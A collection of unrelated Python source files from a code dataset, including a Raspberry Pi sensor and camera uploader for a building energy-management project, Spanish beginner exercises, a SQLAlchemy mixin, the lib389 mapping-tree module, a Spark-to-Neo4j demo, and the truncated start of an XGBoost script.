= picamera.PiCamera()\r\n\r\ni2c = busio.I2C(SCL, SDA)\r\ndisp = adafruit_ssd1306.SSD1306_I2C(128, 64, i2c)\r\ndisp.fill(0)\r\ndisp.show()\r\nwidth = disp.width\r\nheight = disp.height\r\nimage = Image.new(\"1\", (width, height))\r\ndraw = ImageDraw.Draw(image)\r\ndraw.rectangle((0, 0, width, height), outline=0, fill=0)\r\npadding = -2\r\ntop = padding\r\nbottom = height - padding\r\nx = 0\r\nfont = ImageFont.truetype('/usr/share/fonts/truetype/Pixellari.ttf', 16)\r\n\r\n\r\n\r\ndef getValue():\r\n \r\n #read serial\r\n arduinoData = arduino.readline().decode(\"ascii\").split('\\r\\n')\r\n #print(arduinoData[0])\r\n return arduinoData[0]\r\n\r\ndef uploadData(thData):\r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n try:\r\n conn.request('POST','/api/SensorUpdateCurrentValue', thData, headers)\r\n res = conn.getresponse()\r\n thData = res.read()\r\n print(res.status, res.reason)\r\n print(thData.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n logfile = open('updatedata.log', 'a')\r\n timestamp = datetime.now()\r\n print(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Data upload successfully\", file = logfile)\r\n logfile.close()\r\n print(\"Data uploaded\")\r\n except:\r\n logfile = open('updatedata.log', 'a')\r\n timestamp = datetime.now()\r\n print(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Data failed to upload\", file = logfile)\r\n logfile.close()\r\n\r\ndef uploadIRThermalPhoto():\r\n pixels = sensor.read_temp()\r\n print(pixels)\r\n r=requests.post(url=URL, json=pixels, params=PARAMS)\r\n print(r)\r\n print(\"IR Cam Data uploaded\")\r\n\r\ndef uploadPiCameraPhoto():\r\n \r\n time.sleep(2) # Camera warm-up time\r\n camera.capture('piCamPic.jpg')\r\n \r\n with open(\"piCamPic.jpg\", \"rb\") as img_file:\r\n my_string = base64.b64encode(img_file.read())\r\n print(\"base64: \")\r\n print(my_string)\r\n \r\n \r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n camData = \"{\" + '\"' + \"deviceId\" + '\"' + \":\" + '\"CA1\"' + \", \" + '\"' + \"base_cam_img\" + '\"' + \":\" + '\"' + str(my_string) + '\"' + \", \" + '\"' + \"roomId\" + '\"' + \":\" + '\"' + \"F348\" + '\"' + \"}\"\r\n print(camData)\r\n \r\n try:\r\n conn.request('POST','/api/Picam', camData, headers)\r\n res = conn.getresponse()\r\n camthData = res.read()\r\n print(res.status, res.reason)\r\n print(camthData.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n print(\"Pi Cam Data uploaded\")\r\n except:\r\n print(\"failed!!!!!!!!\")\r\n \r\n \r\n \r\ndef getACData():\r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n try:\r\n conn.request('GET','/api/getDeviceStatus/AC011', \"\", headers)\r\n res = conn.getresponse()\r\n thedata = res.read()\r\n print(\"devices: \",thedata,res.status, res.reason)\r\n print(thedata.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n return thedata\r\n except:\r\n print()\r\n \r\n \r\n \r\nwhile (1):\r\n \r\n data = getValue()\r\n print(data)\r\n time.sleep(1)\r\n uploadData(data)\r\n uploadIRThermalPhoto()\r\n #uploadPiCameraPhoto()\r\n \r\n jsonDevice = getACData()\r\n \r\n deviceData = json.loads(jsonDevice)\r\n getDeviceID = deviceData[\"deviceId\"]\r\n getDeviceStatus = deviceData[\"status\"]\r\n getDeviceSetValue = deviceData[\"set_value\"]\r\n #print(getDeviceID, \", \", getDeviceStatus, \", \", getDeviceSetValue)\r\n # Draw a black filled box to clear the image.\r\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\r\n \r\n ACID = getDeviceID #get from API\r\n TempNumber = getDeviceSetValue #get from API\r\n C = \"C\"\r\n Temp = str(TempNumber) + C\r\n if getDeviceStatus == \"True\":\r\n onOff = \"On\"\r\n else:\r\n onOff = \"Off\"\r\n \r\n dateTime = datetime.now()\r\n dataStr = \"Time: \" + dateTime.strftime(\"%H:%M\")\r\n \r\n draw.text((x, top + 12), \"AC: \" + ACID, font=font, fill=255)\r\n draw.text((x, top + 24), \"Temp: \" + Temp, font=font, fill=255)\r\n draw.text((x, top + 36), \"Status: \" + onOff, font=font, fill=255)\r\n draw.text((x, top + 48), dataStr, font=font, fill=255)\r\n\r\n # Display image.\r\n disp.image(image)\r\n disp.show()\r\n time.sleep(0.1)\r\n time.sleep(3)\r\n \r\n \r\n \r\n\r\ntime.sleep(3)\r\ntime.sleep(2)","repo_name":"wAikAp/Intelligent-Energy-Management-System-for-Buildings-INB","sub_path":"raspberryPi_source_code/FYP_py/uploadData.py","file_name":"uploadData.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"29932902959","text":"#convertidor centimtros a pulgadas\ncentimetros = int(input('ingrese longitud en centimetros : '))\npulgadas = 2.54\n\nresultado = centimetros / pulgadas\n\nprint(centimetros ,' cm = ', resultado)\n\n#Escriba un programa que pida al usuario un entero de tres dígitos, y entregue el número con los dígitos en orden inverso\n\nnumeros = (input('ingrese un entero de tres digitos: '))\nprint(numeros[:: -1])\n\n\n#escriba un programa que calcule la hipotenuza segun el teorma de pitagoras\n\na = int(input('ingrese cateto a:'))\nb = int(input('ingrese cateto b: '))\n\nhipotenusa = ((a**2 +b**2)**(1/2))\n\nprint(hipotenusa)\n\n\n##hora futura\nhora1 = int(input('Hora actual: '))\ncantidad = int(input('Cantidad horas: '))\n\nhora_futura = hora1 + cantidad\n\nprint('En ', cantidad, 'horas el reloj marcara las ',hora_futura)\n\n#numero decimal\nnumero_real = float(input('ingrese un numero: '))\nnumero_entero= int(numero_real)\ndecimal = numero_real-numero_entero\n\nprint(decimal)\n\n\n#numero par\nnumero = int(input('ingrese un nuemro:'))\nmultiplo = 4\nif numero % multiplo == 0:\n print('es par')\nelse:\n print('no es par')\n\n#año bisiesto\ndef bisiesto(x):\n if x% 4 ==0 or x%400==0:\n return 'es bisiesto'\n else:\n return 'no es bisiesto' \n \n\nx = int(input('introduzca un año:'))\nprint(x,bisiesto(x))\n\n#ordenar numeros\na = int(input('escribe un nuemro: '))\nb = int(input('escribe otro numero: '))\nc = int(input('escribe otro numero: '))\n\nf = min(a,b,c)\nj = (a+b+c)-a-c\ng = max(a,b,c)\nprint(f'los numero orenados son {f}, {g}, {j}')\n\n\n\n\n \n \n","repo_name":"deibiarcon/ejercicios","sub_path":"ejercicios.py","file_name":"ejercicios.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27811719682","text":"#!/usr/bin/env python3\n\nNAT = \"ip nat inside source list ACL interface FastEthernet0/1 overload\"\nMAC = 'AAAA:BBBB:CCCC'\nIP = '192.168.3.1'\nCONFIG = 'switchport trunk allowed vlan 1,3,10,20,30,100'\ncommand1 = 'switchport trunk allowed vlan 1,3,10,20,30,100'\ncommand2 = 'switchport trunk allowed vlan 1,3,100,200,300'\nVLANS = [10, 20, 30, 1, 2, 100, 10, 30, 3, 4, 10]\nVLANS_uniqe = list(set(VLANS))\nVLANS_uniqe.sort()\n\nVLANS_list = list(set([int(vlan) for vlan in command1.split()[-1].split(',')]) & set([int(vlan) for vlan in command2.split()[-1].split(',')]))\n\n\nospf_route = 'O 10.0.24.0/24 [110/41] via 10.0.13.3, 3d18h, FastEthernet0/0'\n\nospf_route_list = ospf_route.split()\n\nospf_template = '''\n Protocol: {:<}SPF\n Prefix: {:<}\n AD/Metric: {:<}\n Next-Hop: {:<}\n Last Update: {:<}\n Outbound Interface: {:<}\n '''\n\nip_template = '''\n IP address:\n {0:<8} {1:<8} {2:<8} {3:<8}\n {0:08b} {1:08b} {2:08b} {3:08b}\n '''\n\nip_list = IP.split('.')\n\nprint(NAT.replace('Fast','Gigabit'))\nprint(MAC.replace(':','.'))\nprint(CONFIG.split()[-1].split(','))\nprint(VLANS_uniqe)\nprint(VLANS_list)\nprint(ospf_template.format(ospf_route_list[0],ospf_route_list[1],ospf_route_list[2].strip('[]'),ospf_route_list[4].rstrip(','),ospf_route_list[5].rstrip(','),ospf_route_list[6]))\nprint('{:b}{:b}{:b}'.format(int(MAC.split(':')[0],16),int(MAC.split(':')[1],16),int(MAC.split(':')[2],16)))\nprint(ip_template.format(int(ip_list[0]),int(ip_list[1]),int(ip_list[2]),int(ip_list[3])))","repo_name":"kuzzzko/python","sub_path":"task_4_6.py","file_name":"task_4_6.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74828372567","text":"\"\"\"# Function relator mixin\"\"\"\n\nfrom .function_mixin import FunctionMixin\n\nfrom sqlalchemy import Column, Integer, PickleType\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy_mutable import MutableListType, MutableDictType\n\nclass FunctionRelator():\n \"\"\"\n Base for database models with relationships to Function models. It \n provides automatic conversion of functions to Function models when \n setting attributes.\n\n Examples\n --------\n In the setup, we create a SQLAlchemy session, define a Parent model \n subclassing `FunctionRelator`, and a Function model subclassing \n `FunctionMixin`.\n\n ```python\n from sqlalchemy_function import FunctionMixin, FunctionRelator\n\n # standard session creation\n from sqlalchemy import create_engine, Column, ForeignKey, Integer\n from sqlalchemy.orm import relationship, sessionmaker, scoped_session\n from sqlalchemy.ext.declarative import declarative_base\n\n engine = create_engine('sqlite:///:memory:')\n session_factory = sessionmaker(bind=engine)\n Session = scoped_session(session_factory)\n session = Session()\n Base = declarative_base()\n\n # subclass `FunctionRelator` for models with a relationship to Function models\n class Parent(FunctionRelator, Base):\n \\ __tablename__ = 'parent'\n \\ id = Column(Integer, primary_key=True)\n \\ functions = relationship('Function', backref='parent')\n\n # subclass `FunctionMixin` to define a Function model\n class Function(FunctionMixin, Base):\n \\ __tablename__ = 'function'\n \\ id = Column(Integer, primary_key=True)\n \\ parent_id = Column(Integer, ForeignKey('parent.id'))\n\n Base.metadata.create_all(engine)\n ```\n\n We can now set the `functions` attribute to a callable as follows.\n\n ```python\n def foo(*args, **kwargs):\n \\ print('My args are', args)\n \\ print('My kwargs are', kwargs)\n \\ return 'return value'\n \n parent = Parent()\n parent.functions = foo\n # equivalent to:\n # parent.functions = [foo]\n # parent.functions = Function(foo)\n # parent.functions = [Function(foo)]\n parent.functions\n ```\n\n Out:\n\n ```\n [<__main__.Function object at 0x7f4e5a49c160>]\n ```\n \"\"\"\n\n # FunctionRelator overrides the __setattr__ method to check for Function \n # model relationships. These attributes need to be set through the super() \n # method, and are considered 'exempt'.\n _exempt_attrs_fr = ['_func_rel_indicator', '_func_rel_attrs']\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Set class function relationship indicators and attributes.\n\n Attributes\n ----------\n _func_rel_indicator : dict\n Maps attribute names to boolean indicator that the attribute \n subclasses `FunctionMixin`.\n\n _func_rel_attrs : dict\n Maps Function model attribute names to `(class, use_list)` tuple. \n `class` is the Function model class. `use_list` indicates that the \n Function model attribute is a list.\n \"\"\"\n if not hasattr(cls, '_func_rel_indicator'):\n cls._func_rel_indicator = {}\n cls._func_rel_attrs = {}\n try:\n return super().__new__(cls, *args, **kwargs)\n except:\n return super().__new__(cls)\n\n def __setattr__(self, name, value):\n \"\"\"Set attribute\n\n Before setting an attribute, determine if it the attribute is a \n relationship to a Function model. If so, convert the value from a \n function(s) to a Function model(s).\n \"\"\"\n if name in self._exempt_attrs_fr:\n return super().__setattr__(name, value)\n is_func_rel = self._func_rel_indicator.get(name)\n if is_func_rel is None:\n is_func_rel = self._set_func_rel(name)\n if is_func_rel:\n model_class, use_list = self._func_rel_attrs[name]\n if use_list:\n value = self._to_function_models(value, model_class)\n else:\n value = self._to_function_model(value, model_class)\n super().__setattr__(name, value)\n\n @classmethod\n def _set_func_rel(cls, name):\n \"\"\"\n Set the function relationship status for a previously unseen \n attribute.\n\n Parameters\n ----------\n name : str\n Name of the previously unseen attribute.\n\n Returns\n -------\n is_func_rel : bool\n Indicates that the named attribute is a relationship to a Function \n model.\n \"\"\"\n mapper = inspect(cls).mapper\n rel = [r for r in mapper.relationships if r.key == name]\n if not (rel and FunctionMixin in rel[0].mapper.class_.__mro__):\n is_func_rel = False\n else:\n rel = rel[0]\n cls._func_rel_attrs[name] = (rel.mapper.class_, rel.uselist)\n is_func_rel = True\n cls._func_rel_indicator[name] = is_func_rel\n return is_func_rel\n \n def _to_function_models(self, funcs, model_class):\n \"\"\"\n Convert a list of functions to Function models.\n \n Parameters\n ----------\n func : list of callables\n List of callables (functions) to convert\n\n model_class : class\n Class of the Function model to which the functions will be \n converted.\n \"\"\"\n if not isinstance(funcs, list):\n funcs = [funcs]\n models = [self._to_function_model(f, model_class) for f in funcs]\n return [m for m in models if m is not None]\n \n def _to_function_model(self, func, model_class):\n \"\"\"Convert a single function to a Function model.\"\"\"\n if isinstance(func, model_class):\n return func\n if callable(func):\n return model_class(func)\n if func is None:\n return None\n raise ValueError(\n 'Function relationships requre Function models or callables'\n )","repo_name":"dsbowen/sqlalchemy-function","sub_path":"sqlalchemy_function/function_relator.py","file_name":"function_relator.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13408273481","text":"import ldap\nfrom ldap.dn import str2dn, dn2str, is_dn\nfrom lib389._constants import *\nfrom lib389.properties import *\nfrom lib389.utils import suffixfilt, normalizeDN\nfrom lib389 import Entry\nfrom lib389.exceptions import NoSuchEntryError, InvalidArgumentError\n\n\nfrom lib389._mapped_object import DSLdapObjects, DSLdapObject\n\n\nclass MappingTreeLegacy(object):\n '''\n classdocs\n '''\n\n proxied_methods = 'search_s getEntry'.split()\n\n def __init__(self, conn):\n \"\"\"\n @param conn - a DirSrv instance\n \"\"\"\n self.conn = conn\n self.log = conn.log\n\n def __getattr__(self, name):\n if name in MappingTree.proxied_methods:\n from lib389 import DirSrv\n return DirSrv.__getattr__(self.conn, name)\n\n def list(self, suffix=None, bename=None):\n '''\n Returns a search result of the mapping tree entries with all their\n attributes\n\n If 'suffix'/'bename' are specified. It uses 'benamebase' first,\n then 'suffix'.\n\n If neither 'suffix' and 'bename' are specified, it returns all\n the mapping tree entries\n\n @param suffix - suffix of the backend\n @param benamebase - backend common name (e.g. 'userRoot')\n\n @return mapping tree entries\n\n @raise if search fails\n\n '''\n if bename:\n filt = \"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND], bename)\n elif suffix:\n filt = \"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX], suffix)\n else:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n ents = self.conn.search_s(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt)\n for ent in ents:\n self.log.debug('list: %r', ent)\n except:\n raise\n\n return ents\n\n def create(self, suffix=None, bename=None, parent=None):\n '''\n Create a mapping tree entry (under \"cn=mapping tree,cn=config\"),\n for the 'suffix' and that is stored in 'bename' backend.\n 'bename' backend must exist before creating the mapping tree entry.\n\n If a 'parent' is provided that means that we are creating a\n sub-suffix mapping tree.\n\n @param suffix - suffix mapped by this mapping tree entry. It will\n be the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 'userRoot')\n @param parent - if provided is a parent suffix of 'suffix'\n\n @return DN of the mapping tree entry\n\n @raise ldap.NO_SUCH_OBJECT - if the backend entry or parent mapping\n tree does not exist\n ValueError - if missing a parameter,\n\n '''\n # Check suffix is provided\n if not suffix:\n raise ValueError(\"suffix is mandatory\")\n else:\n nsuffix = normalizeDN(suffix)\n\n # Check backend name is provided\n if not bename:\n raise ValueError(\"backend name is mandatory\")\n\n # Check that if the parent suffix is provided then\n # it exists a mapping tree for it\n if parent:\n nparent = normalizeDN(parent)\n filt = suffixfilt(parent)\n try:\n entry = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_SUBTREE,\n filt)\n pass\n except NoSuchEntryError:\n raise ValueError(\"parent suffix has no mapping tree\")\n else:\n nparent = \"\"\n\n # Check if suffix exists, return\n filt = suffixfilt(suffix)\n try:\n entry = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_SUBTREE,\n filt)\n return entry\n except ldap.NO_SUCH_OBJECT:\n entry = None\n\n #\n # Now start the real work\n #\n\n # fix me when we can actually used escaped DNs\n dn = ','.join(('cn=\"%s\"' % nsuffix, DN_MAPPING_TREE))\n entry = Entry(dn)\n entry.update({\n 'objectclass': ['top', 'extensibleObject', MT_OBJECTCLASS_VALUE],\n 'nsslapd-state': 'backend',\n # the value in the dn has to be DN escaped\n # internal code will add the quoted value - unquoted value is\n # useful for searching.\n MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX]: nsuffix,\n MT_PROPNAME_TO_ATTRNAME[MT_BACKEND]: bename\n })\n\n # possibly add the parent\n if parent:\n entry.setValues(MT_PROPNAME_TO_ATTRNAME[MT_PARENT_SUFFIX], nparent)\n\n try:\n self.log.debug(\"Creating entry: %s\", entry.dn)\n self.log.info(\"Entry %r\", entry)\n self.conn.add_s(entry)\n except ldap.LDAPError as e:\n raise ldap.LDAPError(\"Error adding suffix entry \" + dn, e)\n\n ret = self.conn._test_entry(dn, ldap.SCOPE_BASE)\n return ret\n\n def delete(self, suffix=None, bename=None, name=None):\n '''\n Delete a mapping tree entry (under \"cn=mapping tree,cn=config\"),\n for the 'suffix' and that is stored in 'benamebase' backend.\n 'benamebase' backend is not changed by the mapping tree deletion.\n\n If 'name' is specified. It uses it to retrieve the mapping tree\n to delete. Else if 'suffix'/'benamebase' are specified. It uses\n both to retrieve the mapping tree to delete\n\n @param suffix - suffix mapped by this mapping tree entry. It is\n the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 'userRoot')\n @param name - DN of the mapping tree entry\n\n @return None\n\n @raise ldap.NO_SUCH_OBJECT - the entry is not found\n KeyError if 'name', 'suffix' and\n 'benamebase' are missing\n UnwillingToPerformError - If the mapping tree has\n subordinates\n '''\n if name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n try:\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt)\n self.log.debug(\"delete: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n else:\n filt = None\n\n if suffix:\n filt = suffixfilt(suffix)\n\n if bename:\n if filt:\n filt = (\"(&(%s=%s)%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename,\n filt))\n else:\n filt = (\"(%s=%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND], bename))\n\n try:\n ent = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt)\n self.log.debug(\"delete: %s found by with %s\", ent.dn, filt)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n #\n # At this point 'ent' contains the mapping tree entry to delete\n #\n\n # First Check there is no child (replica, replica agreements)\n try:\n ents = self.conn.search_s(ent.dn, ldap.SCOPE_SUBTREE,\n \"objectclass=*\")\n except:\n raise\n if len(ents) != 1:\n for entry in ents:\n self.log.warning(\"Error: it exists %s under %s\",\n entry.dn, ent.dn)\n raise ldap.UNWILLING_TO_PERFORM(\n \"Unable to delete %s, it is not a leaf\" % ent.dn)\n else:\n for entry in ents:\n self.log.warning(\"Warning: %s (%s)\", entry.dn, ent.dn)\n self.conn.delete_s(ent.dn)\n\n def getProperties(self, suffix=None, bename=None, name=None,\n properties=None):\n '''\n Returns a dictionary of the requested properties.\n If properties is missing, it returns all the properties.\n\n The returned properties are those of the 'suffix' and that is\n stored in 'benamebase' backend.\n\n If 'name' is specified. It uses it to retrieve the mapping tree\n to delete Else if 'suffix'/'benamebase' are specified. It uses\n both to retrieve the mapping tree to\n\n If 'name', 'benamebase' and 'suffix' are missing it raise an\n exception\n\n @param suffix - suffix mapped by this mapping tree entry.\n It is the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 'userRoot')\n @param name - DN of the mapping tree entry\n @param - properties - list of properties\n\n @return - returns a dictionary of the properties\n\n @raise ValueError - if some name of properties are not valid\n KeyError - if some name of properties are not valid\n ldap.NO_SUCH_OBJECT - if the mapping tree entry is not found\n '''\n\n if name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt,\n list(MT_PROPNAME_TO_ATTRNAME.values())\n )\n self.log.debug(\"delete: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n else:\n filt = None\n\n if suffix:\n filt = suffixfilt(suffix)\n\n if bename:\n if filt:\n filt = (\"(&(%s=%s)%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename, filt))\n else:\n filt = (\"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename))\n\n try:\n ent = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt,\n list(MT_PROPNAME_TO_ATTRNAME.values())\n )\n self.log.debug(\"delete: %s found by with %s\", ent.dn, filt)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n result = {}\n attrs = []\n if properties:\n #\n # build the list of attributes we are looking for\n\n for prop_name in properties:\n prop_attr = MT_PROPNAME_TO_ATTRNAME[prop_name]\n if not prop_attr:\n raise ValueError(\"Improper property name: %s \", prop_name)\n self.log.debug(\"Look for attr %s (property: %s)\",\n prop_attr, prop_name)\n attrs.append(prop_attr)\n\n # now look for each attribute from the MT entry\n for attr in ent.getAttrs():\n # given an attribute name retrieve the property name\n props = [k for k, v in MT_PROPNAME_TO_ATTRNAME.items()\n if v.lower() == attr.lower()]\n\n # If this attribute is present in the MT properties and was\n # requested, adds it to result.\n if len(props) > 0:\n if len(attrs) > 0:\n if MT_PROPNAME_TO_ATTRNAME[props[0]] in attrs:\n # if the properties was requested\n self.log.debug(\"keep only attribute %s \", props[0])\n result[props[0]] = ent.getValues(attr)\n else:\n result[props[0]] = ent.getValues(attr)\n return result\n\n def setProperties(self, suffix=None, bename=None, name=None,\n properties=None):\n raise NotImplementedError\n\n def toSuffix(self, entry=None, name=None):\n '''\n Return, for a given mapping tree entry, the suffix values.\n Suffix values are identical from a LDAP point of views.\n Suffix values may be surrounded by \", or containing '\\'\n escape characters.\n\n @param entry - LDAP entry of the mapping tree\n @param name - mapping tree DN\n\n @result list of values of suffix attribute (aka 'cn')\n\n @raise ldap.NO_SUCH_OBJECT - in name is invalid DN\n ValueError - entry does not contains the suffix attribute\n InvalidArgumentError - if both entry/name are missing\n '''\n attr_suffix = MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX]\n if entry:\n if not entry.hasValue(attr_suffix):\n raise ValueError(\"Entry has no %s attribute %r\" %\n (attr_suffix, entry))\n return entry.getValues(attr_suffix)\n elif name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n attrs = [attr_suffix]\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt, attrs)\n self.log.debug(\"toSuffix: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n if not ent.hasValue(attr_suffix):\n raise ValueError(\"Entry has no %s attribute %r\" %\n (attr_suffix, ent))\n return ent.getValues(attr_suffix)\n else:\n raise InvalidArgumentError(\"entry or name are mandatory\")\n\n\nclass MappingTree(DSLdapObject):\n \"\"\"Mapping tree DSLdapObject with:\n - must attributes = ['cn']\n - RDN attribute is 'cn'\n\n :param instance: An instance\n :type instance: lib389.DirSrv\n :param dn: Entry DN\n :type dn: str\n \"\"\"\n\n _must_attributes = ['cn']\n\n def __init__(self, instance, dn=None):\n super(MappingTree, self).__init__(instance, dn)\n self._rdn_attribute = 'cn'\n self._must_attributes = ['cn']\n self._create_objectclasses = ['top', 'extensibleObject', 'nsMappingTree']\n self._protected = False\n\n def set_parent(self, parent):\n \"\"\"\n Set the parent suffix to create a tree of backends. For example:\n\n be_1 = bes.create(properties={...})\n be_2 = bes.create(properties={...})\n mt = be_2.get_mapping_tree()\n mt.set_parent(be_1.get_attr_val_bytes('nsslapd-suffix'))\n\n :param parent: The parent suffix above this mapping tree.\n :type parent: str\n \"\"\"\n self.replace('nsslapd-parent-suffix', parent)\n\n\nclass MappingTrees(DSLdapObjects):\n \"\"\"DSLdapObjects that represents Mapping trees\n\n :param instance: An instance\n :type instance: lib389.DirSrv\n \"\"\"\n\n def __init__(self, instance):\n super(MappingTrees, self).__init__(instance=instance)\n self._objectclasses = ['nsMappingTree']\n self._filterattrs = ['cn', 'nsslapd-backend']\n self._childobject = MappingTree\n self._basedn = DN_MAPPING_TREE\n\n def get_root_suffix_by_entry(self, entry_dn):\n \"\"\"Get the root suffix to which the entry belongs\n\n :param entry_dn: An entry DN\n :type entry_dn: str\n :returns: str\n \"\"\"\n\n mapping_tree_list = sorted(self.list(), key=lambda b: len(b.dn), reverse=True)\n\n entry_dn_parts = str2dn(entry_dn)\n processing = True\n while processing:\n compare_dn = dn2str(entry_dn_parts)\n for mapping_tree in mapping_tree_list:\n if str.lower(compare_dn) == str.lower(mapping_tree.rdn):\n processing = False\n return mapping_tree.rdn\n if entry_dn_parts:\n entry_dn_parts.pop(0)\n else:\n processing = False\n raise ldap.NO_SUCH_OBJECT(f\"{entry_dn} doesn't belong to any suffix\")\n\n def get(self, selector=[], dn=None, json=False):\n \"\"\"Create a test user with uid=test_user_UID rdn\n\n :param uid: User id\n :type uid: int\n :param gid: Group id\n :type gid: int\n\n :returns: DSLdapObject of the created entry\n \"\"\"\n\n # Normalise escaped characters\n if is_dn(selector):\n selector = dn2str(str2dn(selector))\n\n return super(MappingTrees, self).get(selector, dn, json)\n","repo_name":"389ds/389-ds-base","sub_path":"src/lib389/lib389/mappingTree.py","file_name":"mappingTree.py","file_ext":"py","file_size_in_byte":16963,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"3831260075","text":"from pyspark.sql import SparkSession\nfrom neo4j import GraphDatabase\nfrom pyspark.sql import Row\n\nURI = \"neo4j://localhost:11003\"\nAUTH = (\"neo4j\", \"Ne04j!\")\n\ndef merge_nodes_batchmode(tx, dict_list):\n query = (\n \"\"\"CALL apoc.periodic.iterate(\n 'WITH $batch AS batch UNWIND batch AS bb RETURN bb',\n '\n MERGE (p:Person {name:bb.Name,birth:bb.BirthDate,gender:bb.Gender,salary:bb.Salary})\n ',\n {batchSize: 1000, parallel:true, concurrency:16, retries:5, params: {batch: $batch}}\n )\n \"\"\"\n )\n result = tx.run(query, batch=dict_list)\n\ndef merge_nodes_one_batch(tx, dict_list):\n query = (\n \"\"\"\n WITH $batch AS batch UNWIND batch AS bb \n MERGE (p:Person {name:bb.Name,birth:bb.BirthDate,gender:bb.Gender,salary:bb.Salary})\n \"\"\"\n )\n result = tx.run(query, batch=dict_list)\n\ndef create_dict(df):\n data_collect = df.collect()\n my_dict=[]\n i=0\n # looping thorough each row of the dataframe\n for row in data_collect:\n row2 = Row(Name=row[\"Name\"], BirthDate=row[\"BirthDate\"],Gender=row[\"Gender\"],Salary=row[\"Salary\"])\n row3=row2.asDict()\n my_dict.append(row3)\n i +=1\n print(my_dict)\n return my_dict\n\n# Create a spark session\nspark = SparkSession.builder.appName('DF_to_dict').getOrCreate()\n\n# Create data in dataframe\ndata = [(('Ram'), '1991-04-01', 'M', 3000),\n (('Mike'), '2000-05-19', 'M', 4000),\n (('Rohini'), '1978-09-05', 'M', 4000),\n (('Maria'), '1967-12-01', 'F', 4000),\n (('Jenis'), '1980-02-17', 'F', 1200)]\n\ncolumns = [\"Name\", \"BirthDate\", \"Gender\", \"Salary\"]\ndf = spark.createDataFrame(data=data,\n schema=columns)\nbatch_dict=create_dict(df)\n\nwith GraphDatabase.driver(URI, auth=AUTH) as driver:\n with driver.session() as session:\n session = driver.session(database='neo4j')\n session.write_transaction(merge_nodes_batchmode, batch_dict)\n\n\n","repo_name":"ichbintonywu/spark2neo4j","sub_path":"neo4jdemo_df2dictList_merge.py","file_name":"neo4jdemo_df2dictList_merge.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8597800196","text":"from xgboost import XGBClassifier\r\nfrom sklearn.datasets import load_svmlight_file\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom itertools import product\r\nimport warnings\r\n\r\nwarnings.filterwarnings('ignore')\r\n\r\n# Load data into test and train\r\nx_test, y_test = load_svmlight_file(\"a9a.t\")\r\nx_train, y_train = load_svmlight_file(\"a9a.txt\")\r\n\r\n# Fit model based on training data, use default values for ease of understanding\r\ndata_model = XGBClassifier()\r\ndata_model.fit(x_train, y_train)\r\nprint(\"Default values for XGBoost hyperparameters : \\n \", data_model)\r\n\r\n# Predictions for test data\r\ny_prediction = data_model.predict(x_test)\r\nall_predictions = [round(val) for val in y_prediction]\r\n\r\n# Run predictions and calculate accuracy\r\nacc = accuracy_score(y_test, all_predictions)\r\nprint(\"\\n 